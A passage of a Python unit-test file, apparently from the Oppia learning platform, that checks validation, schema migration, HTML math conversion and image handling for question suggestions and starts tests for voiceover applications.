expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
def test_get_score_part_helper_methods(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertEqual(suggestion.get_score_type(), 'question')
self.assertEqual(suggestion.get_score_sub_type(), 'topic_1')
def test_validate_score_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.score_category = 'content.score_sub_type'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected the first part of score_category to be "question"'
):
suggestion.validate()
def test_validate_change_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change = 'invalid_change'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected change to be an instance of QuestionSuggestionChange'
):
suggestion.validate()
def test_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.cmd = None
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to contain cmd'
):
suggestion.validate()
def test_validate_change_cmd_type(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.cmd = 'invalid_cmd'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected cmd to be create_new_fully_specified_question'
):
suggestion.validate()
def test_validate_change_question_dict(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.question_dict = None
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to contain question_dict'
):
suggestion.validate()
def test_validate_change_question_state_data_schema_version(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
        # We do not set the value on suggestion.change.question_dict
        # directly, since pylint raises an unsupported-assignment-operation
        # error for that pattern. A detailed analysis is available in this
        # issue: https://github.com/oppia/oppia/issues/7008.
question_dict = suggestion.change.question_dict
question_dict['question_state_data_schema_version'] = 0
suggestion.change.question_dict = question_dict
with self.assertRaisesRegex(
utils.ValidationError,
'Expected question state schema version to be %s, '
'received 0' % feconf.CURRENT_STATE_SCHEMA_VERSION
):
suggestion.validate()
def test_validate_change_skill_difficulty_none(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.skill_difficulty = None
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to contain skill_difficulty'
):
suggestion.validate()
def test_validate_change_skill_difficulty_invalid_value(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.change.skill_difficulty = 0.4
with self.assertRaisesRegex(
utils.ValidationError,
'Expected change skill_difficulty to be one of '
):
suggestion.validate()
def test_pre_accept_validate_change_skill_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
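        # Point the suggestion at an existing skill so pre-accept validation
        # passes, then clear skill_id to trigger the error.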
skill_id = skill_services.get_new_skill_id()
self.save_new_skill(skill_id, self.author_id, description='description')
suggestion.change.skill_id = skill_id
suggestion.pre_accept_validate()
suggestion.change.skill_id = None
with self.assertRaisesRegex(
utils.ValidationError, 'Expected change to contain skill_id'
):
suggestion.pre_accept_validate()
def test_pre_accept_validate_change_invalid_skill_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
skill_id = skill_services.get_new_skill_id()
self.save_new_skill(skill_id, self.author_id, description='description')
suggestion.change.skill_id = skill_id
suggestion.pre_accept_validate()
suggestion.change.skill_id = skill_services.get_new_skill_id()
with self.assertRaisesRegex(
utils.ValidationError, 'The skill with the given id doesn\'t exist.'
):
suggestion.pre_accept_validate()
def test_get_change_list_for_accepting_suggestion(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertIsNone(suggestion.get_change_list_for_accepting_suggestion())
def test_populate_old_value_of_change(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
self.assertIsNone(suggestion.populate_old_value_of_change())
def test_cannot_accept_suggestion_with_invalid_skill_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.change.skill_id = skill_services.get_new_skill_id()
with self.assertRaisesRegex(
utils.ValidationError,
'The skill with the given id doesn\'t exist.'
):
suggestion.accept('commit message')
def test_pre_update_validate_change_cmd(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': question_domain.CMD_UPDATE_QUESTION_PROPERTY,
'property_name': question_domain.QUESTION_PROPERTY_LANGUAGE_CODE,
'new_value': 'bn',
'old_value': 'en'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change cmd must be equal to '
'create_new_fully_specified_question'
):
suggestion.pre_update_validate(
question_domain.QuestionChange(change))
def test_pre_update_validate_change_skill_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_2'
}
with self.assertRaisesRegex(
utils.ValidationError,
'The new change skill_id must be equal to skill_1'
):
suggestion.pre_update_validate(
question_domain.QuestionChange(change))
def test_pre_update_validate_complains_if_nothing_changed(self):
change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
suggestion = suggestion_registry.SuggestionAddQuestion(
'exploration.exp1.thread1', 'exp1', 1,
suggestion_models.STATUS_ACCEPTED, self.author_id,
self.reviewer_id, change,
            'question.topic_1', 'en', False, self.fake_date)
new_change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
with self.assertRaisesRegex(
utils.ValidationError,
'At least one of the new skill_difficulty or question_dict '
'should be changed.'):
suggestion.pre_update_validate(
question_domain.QuestionSuggestionChange(new_change))
def test_pre_update_validate_accepts_a_change_in_skill_difficulty_only(
self):
change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
suggestion = suggestion_registry.SuggestionAddQuestion(
'exploration.exp1.thread1', 'exp1', 1,
suggestion_models.STATUS_ACCEPTED, self.author_id,
self.reviewer_id, change,
            'question.topic_1', 'en', False, self.fake_date)
new_change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.6
}
        self.assertIsNone(
            suggestion.pre_update_validate(
                question_domain.QuestionSuggestionChange(new_change)))
def test_pre_update_validate_accepts_a_change_in_state_data_only(self):
change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
suggestion = suggestion_registry.SuggestionAddQuestion(
'exploration.exp1.thread1', 'exp1', 1,
suggestion_models.STATUS_ACCEPTED, self.author_id,
self.reviewer_id, change,
            'question.topic_1', 'en', False, self.fake_date)
new_change = {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'hi',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION)
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3
}
self.assertEqual(
suggestion.pre_update_validate(
question_domain.QuestionSuggestionChange(new_change)), None)
def test_validate_author_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = 0
with self.assertRaisesRegex(
utils.ValidationError, 'Expected author_id to be a string'):
suggestion.validate()
def test_validate_author_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.author_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected author_id to be in a valid user ID format.'):
suggestion.validate()
def test_validate_final_reviewer_id(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = 1
with self.assertRaisesRegex(
utils.ValidationError, 'Expected final_reviewer_id to be a string'):
suggestion.validate()
def test_validate_final_reviewer_id_format(self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.final_reviewer_id = ''
with self.assertRaisesRegex(
utils.ValidationError,
'Expected final_reviewer_id to be in a valid user ID format'):
suggestion.validate()
def test_validate_language_code_fails_when_language_codes_do_not_match(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
expected_question_dict = (
expected_suggestion_dict['change']['question_dict']
)
suggestion.validate()
expected_question_dict['language_code'] = 'wrong_language_code'
with self.assertRaisesRegex(
utils.ValidationError,
'Expected question language_code.wrong_language_code. to be same '
'as suggestion language_code.en.'
):
suggestion.validate()
def test_validate_language_code_fails_when_language_code_is_set_to_none(
self):
expected_suggestion_dict = self.suggestion_dict
suggestion = suggestion_registry.SuggestionAddQuestion(
expected_suggestion_dict['suggestion_id'],
expected_suggestion_dict['target_id'],
expected_suggestion_dict['target_version_at_submission'],
expected_suggestion_dict['status'], self.author_id,
self.reviewer_id, expected_suggestion_dict['change'],
expected_suggestion_dict['score_category'],
expected_suggestion_dict['language_code'], False, self.fake_date)
suggestion.validate()
suggestion.language_code = None
with self.assertRaisesRegex(
utils.ValidationError,
'Expected language_code to be en, received None'):
suggestion.validate()
    def test_get_all_html_content_strings(self):
suggestion = suggestion_registry.SuggestionAddQuestion(
self.suggestion_dict['suggestion_id'],
self.suggestion_dict['target_id'],
self.suggestion_dict['target_version_at_submission'],
self.suggestion_dict['status'], self.author_id,
self.reviewer_id, self.suggestion_dict['change'],
self.suggestion_dict['score_category'],
            self.suggestion_dict['language_code'], False, self.fake_date)
actual_outcome_list = suggestion.get_all_html_content_strings()
expected_outcome_list = [
u'', u'<p>This is a hint.</p>', u'<p>This is a solution.</p>', u'']
self.assertEqual(expected_outcome_list, actual_outcome_list)
def test_convert_html_in_suggestion_change(self):
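        # Applying the math RTE conversion function should rewrite the legacy
        # raw_latex-with-value attribute in the question content HTML into the
        # newer math_content-with-value format.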
html_content = (
'<p>Value</p><oppia-noninteractive-math raw_latex-with-value="&a'
'mp;quot;+,-,-,+&quot;"></oppia-noninteractive-math>')
expected_html_content = (
'<p>Value</p><oppia-noninteractive-math math_content-with-value='
'"{&quot;raw_latex&quot;: &quot;+,-,-,+&quot;, &'
'amp;quot;svg_filename&quot;: &quot;&quot;}"></oppia'
'-noninteractive-math>')
answer_group = {
'outcome': {
'dest': None,
'feedback': {
'content_id': 'feedback_1',
'html': ''
},
'labelled_as_correct': True,
'param_changes': [],
'refresher_exploration_id': None,
'missing_prerequisite_skill_id': None
},
'rule_specs': [{
'inputs': {
'x': 0
},
'rule_type': 'Equals'
}],
'training_data': [],
'tagged_skill_misconception_id': None
}
question_state_dict = {
'content': {
'content_id': 'content_1',
'html': html_content
},
'recorded_voiceovers': {
'voiceovers_mapping': {
'content_1': {},
'feedback_1': {},
'feedback_2': {},
'hint_1': {},
'solution': {}
}
},
'written_translations': {
'translations_mapping': {
'content_1': {},
'feedback_1': {},
'feedback_2': {},
'hint_1': {},
'solution': {}
}
},
'interaction': {
'answer_groups': [answer_group],
'confirmed_unclassified_answers': [],
'customization_args': {
'choices': {
'value': [{
'html': 'option 1',
'content_id': 'ca_choices_0'
}]
},
'showChoicesInShuffledOrder': {
'value': True
}
},
'default_outcome': {
'dest': None,
'feedback': {
'content_id': 'feedback_2',
'html': 'Correct Answer'
},
'param_changes': [],
'refresher_exploration_id': None,
'labelled_as_correct': True,
'missing_prerequisite_skill_id': None
},
'hints': [{
'hint_content': {
'content_id': 'hint_1',
'html': 'Hint 1'
}
}],
'solution': {
'answer_is_exclusive': False,
'correct_answer': 0,
'explanation': {
'content_id': 'solution',
'html': '<p>This is a solution.</p>'
}
},
'id': 'MultipleChoiceInput'
},
'param_changes': [],
'solicit_answer_details': False,
'classifier_model_id': None
}
suggestion_dict = {
'suggestion_id': 'skill1.thread1',
'suggestion_type': feconf.SUGGESTION_TYPE_ADD_QUESTION,
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': 'skill1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': question_state_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_1'],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
},
'skill_id': 'skill_1',
'skill_difficulty': 0.3,
},
'score_category': 'question.skill1',
'language_code': 'en',
'last_updated': utils.get_time_in_millisecs(self.fake_date)
}
suggestion = suggestion_registry.SuggestionAddQuestion(
suggestion_dict['suggestion_id'], suggestion_dict['target_id'],
suggestion_dict['target_version_at_submission'],
suggestion_dict['status'], self.author_id, self.reviewer_id,
suggestion_dict['change'], suggestion_dict['score_category'],
suggestion_dict['language_code'], False, self.fake_date)
suggestion.convert_html_in_suggestion_change(
html_validation_service.add_math_content_to_math_rte_components)
self.assertEqual(
suggestion.change.question_dict['question_state_data']['content'][
'html'], expected_html_content)
def test_accept_suggestion_with_images(self):
html_content = (
'<p>Value</p><oppia-noninteractive-math math_content-with-value='
'"{&quot;raw_latex&quot;: &quot;+,-,-,+&quot;, &'
'amp;quot;svg_filename&quot;: &quot;img.svg&quot;}">'
'</oppia-noninteractive-math>')
question_state_dict = self._create_valid_question_data(
'default_state').to_dict()
question_state_dict['content']['html'] = html_content
with utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'),
'rb', encoding=None) as f:
raw_image = f.read()
image_context = feconf.IMAGE_CONTEXT_QUESTION_SUGGESTIONS
fs_services.save_original_and_compressed_versions_of_image(
'img.svg', image_context, 'skill1',
raw_image, 'image', False)
self.save_new_skill('skill1', self.author_id, description='description')
suggestion_dict = {
'suggestion_id': 'skill1.thread1',
'suggestion_type': feconf.SUGGESTION_TYPE_ADD_QUESTION,
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': 'skill1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': question_state_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill_1'],
'inapplicable_skill_misconception_ids': []
},
'skill_id': 'skill1',
'skill_difficulty': 0.3,
},
'score_category': 'question.skill1',
'language_code': 'en',
'last_updated': utils.get_time_in_millisecs(self.fake_date)
}
suggestion = suggestion_registry.SuggestionAddQuestion(
suggestion_dict['suggestion_id'], suggestion_dict['target_id'],
suggestion_dict['target_version_at_submission'],
suggestion_dict['status'], self.author_id, self.reviewer_id,
suggestion_dict['change'], suggestion_dict['score_category'],
suggestion_dict['language_code'], False, self.fake_date)
suggestion.accept('commit_message')
def test_accept_suggestion_with_image_region_interactions(self):
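        # Accepting a question suggestion that uses an ImageClickInput
        # interaction should copy the referenced image into the file system of
        # the newly created question.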
with utils.open_file(
os.path.join(feconf.TESTS_DATA_DIR, 'img.png'), 'rb',
encoding=None) as f:
original_image_content = f.read()
fs_services.save_original_and_compressed_versions_of_image(
'image.png', 'question_suggestions', 'skill1',
original_image_content, 'image', True)
question_state_dict = {
'content': {
'html': '<p>Text</p>',
'content_id': 'content'
},
'classifier_model_id': None,
'linked_skill_id': None,
'interaction': {
'answer_groups': [
{
'rule_specs': [
{
'rule_type': 'IsInRegion',
'inputs': {'x': 'Region1'}
}
],
'outcome': {
'dest': None,
'feedback': {
'html': '<p>assas</p>',
'content_id': 'feedback_0'
},
'labelled_as_correct': True,
'param_changes': [],
'refresher_exploration_id': None,
'missing_prerequisite_skill_id': None
},
'training_data': [],
'tagged_skill_misconception_id': None
}
],
'confirmed_unclassified_answers': [],
'customization_args': {
'imageAndRegions': {
'value': {
'imagePath': 'image.png',
'labeledRegions': [
{
'label': 'Region1',
'region': {
'regionType': 'Rectangle',
'area': [
[
0.2644628099173554,
0.21807065217391305
],
[
0.9201101928374655,
0.8847373188405797
]
]
}
}
]
}
},
'highlightRegionsOnHover': {
'value': False
}
},
'default_outcome': {
'dest': None,
'feedback': {
'html': '<p>wer</p>',
'content_id': 'default_outcome'
},
'labelled_as_correct': False,
'param_changes': [],
'refresher_exploration_id': None,
'missing_prerequisite_skill_id': None
},
'hints': [
{
'hint_content': {
'html': '<p>assaas</p>',
'content_id': 'hint_1'
}
}
],
'id': 'ImageClickInput', 'solution': None
},
'param_changes': [],
'recorded_voiceovers': {
'voiceovers_mapping': {
'content': {},
'default_outcome': {},
'feedback_0': {},
'hint_1': {}
}
},
'solicit_answer_details': False,
'card_is_checkpoint': False,
'written_translations': {
'translations_mapping': {
'content': {},
'default_outcome': {},
'feedback_0': {},
'hint_1': {}
}
},
'next_content_id_index': 2
}
suggestion_dict = {
'suggestion_id': 'skill1.thread1',
'suggestion_type': feconf.SUGGESTION_TYPE_ADD_QUESTION,
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': 'skill1',
'target_version_at_submission': 1,
'status': suggestion_models.STATUS_ACCEPTED,
'author_name': 'author',
'final_reviewer_id': self.reviewer_id,
'change': {
'cmd': question_domain.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION,
'question_dict': {
'question_state_data': question_state_dict,
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': ['skill1'],
'inapplicable_skill_misconception_ids': []
},
'skill_id': 'skill1',
'skill_difficulty': 0.3,
},
'score_category': 'question.skill1',
'language_code': 'en',
'last_updated': utils.get_time_in_millisecs(self.fake_date)
}
self.save_new_skill(
'skill1', self.author_id, description='description')
suggestion = suggestion_registry.SuggestionAddQuestion(
suggestion_dict['suggestion_id'], suggestion_dict['target_id'],
suggestion_dict['target_version_at_submission'],
suggestion_dict['status'], self.author_id, self.reviewer_id,
suggestion_dict['change'], suggestion_dict['score_category'],
suggestion_dict['language_code'], False, self.fake_date)
suggestion.accept('commit_message')
question = question_services.get_questions_by_skill_ids(
1, ['skill1'], False)[0]
destination_fs = fs_domain.AbstractFileSystem(
fs_domain.GcsFileSystem(
feconf.ENTITY_TYPE_QUESTION, question.id))
self.assertTrue(destination_fs.isfile('image/%s' % 'image.png'))
self.assertEqual(
suggestion.status,
suggestion_models.STATUS_ACCEPTED)
    def test_constructor_updates_state_schema_in_change_cmd(self):
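        # The constructor is expected to migrate question_state_data from
        # schema version 27 up to feconf.CURRENT_STATE_SCHEMA_VERSION.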
score_category = (
suggestion_models.SCORE_TYPE_QUESTION +
suggestion_models.SCORE_CATEGORY_DELIMITER + 'skill_id')
change = {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': {
'question_state_data': self.VERSION_27_STATE_DICT,
'question_state_data_schema_version': 27,
'language_code': 'en',
'linked_skill_ids': ['skill_id'],
'inapplicable_skill_misconception_ids': []
},
'skill_id': 'skill_id',
'skill_difficulty': 0.3
}
self.assertEqual(
change['question_dict']['question_state_data_schema_version'], 27)
suggestion = suggestion_registry.SuggestionAddQuestion(
'suggestionId', 'target_id', 1, suggestion_models.STATUS_IN_REVIEW,
self.author_id, None, change, score_category, 'en', False,
self.fake_date)
self.assertEqual(
suggestion.change.question_dict[
'question_state_data_schema_version'],
feconf.CURRENT_STATE_SCHEMA_VERSION)
    def test_constructor_raises_exception_for_invalid_state_schema_version(
            self):
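        # State schema versions below the minimum supported version cannot be
        # migrated, so constructing the suggestion should raise a
        # ValidationError.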
score_category = (
suggestion_models.SCORE_TYPE_QUESTION +
suggestion_models.SCORE_CATEGORY_DELIMITER + 'skill_id')
change = {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': {
'question_state_data': self.VERSION_27_STATE_DICT,
'question_state_data_schema_version': 23,
'language_code': 'en',
'linked_skill_ids': ['skill_id'],
'inapplicable_skill_misconception_ids': []
},
'skill_id': 'skill_id',
'skill_difficulty': 0.3
}
self.assertEqual(
change['question_dict']['question_state_data_schema_version'], 23)
with self.assertRaisesRegex(
utils.ValidationError,
'Expected state schema version to be in between 25'
):
suggestion_registry.SuggestionAddQuestion(
'suggestionId', 'target_id', 1,
suggestion_models.STATUS_IN_REVIEW, self.author_id, None,
change, score_category, 'en', False, self.fake_date)
class MockInvalidVoiceoverApplication(
suggestion_registry.BaseVoiceoverApplication):
def __init__(self): # pylint: disable=super-init-not-called
pass
class BaseVoiceoverApplicationUnitTests(test_utils.GenericTestBase):
"""Tests for the BaseVoiceoverApplication class."""
def setUp(self):
super(BaseVoiceoverApplicationUnitTests, self).setUp()
self.base_voiceover_application = MockInvalidVoiceoverApplication()
def test_base_class_init_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseVoiceoverApplication should implement '
'__init__.'):
suggestion_registry.BaseVoiceoverApplication()
def test_base_class_accept_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseVoiceoverApplication should implement accept.'):
self.base_voiceover_application.accept()
def test_base_class_reject_raises_error(self):
with self.assertRaisesRegex(
NotImplementedError,
'Subclasses of BaseVoiceoverApplication should implement reject.'):
self.base_voiceover_application.reject()
class ExplorationVoiceoverApplicationUnitTest(test_utils.GenericTestBase):
"""Tests for the ExplorationVoiceoverApplication class."""
def setUp(self):
super(ExplorationVoiceoverApplicationUnitTest, self).setUp()
self.signup('[email protected]', 'author')
self.author_id = self.get_user_id_from_email('[email protected]')
self.signup('[email protected]', 'reviewer')
self.reviewer_id = self.get_user_id_from_email('[email protected]')
self.voiceover_application = (
